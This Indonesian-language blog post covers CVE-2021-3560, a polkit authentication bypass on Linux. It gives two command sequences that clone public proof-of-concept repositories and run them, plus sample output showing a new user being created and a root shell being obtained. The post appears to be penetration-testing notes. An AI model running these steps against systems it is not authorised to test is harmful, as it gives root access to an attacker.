[CVE-2021-3560] Polkit
polkit adalah layanan sistem yang diinstal secara default di banyak distribusi Linux. Ini digunakan oleh systemd, jadi setiap distribusi Linux yang menggunakan systemd juga menggunakan polkit.
CVE-2021-3560 adalah kerentanan yang mem-bypass otentikasi pada polkit, yang memungkinkan user biasa untuk memanggil privileged methods menggunakan DBus.
Tahapan eksploitasi
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
# Cara-1:
# Harus terinstall accountsservice and gnome-control-center
➜ git clone https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation
➜ CVE-2021-3560-Polkit-Privilege-Esclation
➜ chmod +x poc.sh
➜ ./poc.sh
# Cara-2:
➜ git clone https://github.com/Almorabea/Polkit-exploit
➜ cd Polkit-exploit
➜ python3 CVE-2021-3560.py
**************
Exploit: Privilege escalation with polkit - CVE-2021-3560
Exploit code written by Ahmad Almorabea @almorabea
Original Exploit Author: Kevin Backhouse
For more details check this: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/#history
[+]Starting the Exploit
[+] User Created with the name of ahmed
[+] Timed out at: 0.008446890996407191
[+] Timed out at: 0.008934336684707084
[+] Exploit Completed, your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root
bash: cannot set terminal process group (46983): Inappropriate ioctl for device
bash: no job control in this shell
root@ubuntu:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/tmp# whoami
root
Referensi
- https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/
- https://github.com/Almorabea/Polkit-exploit
- https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation
This post is licensed under CC BY 4.0 by the author.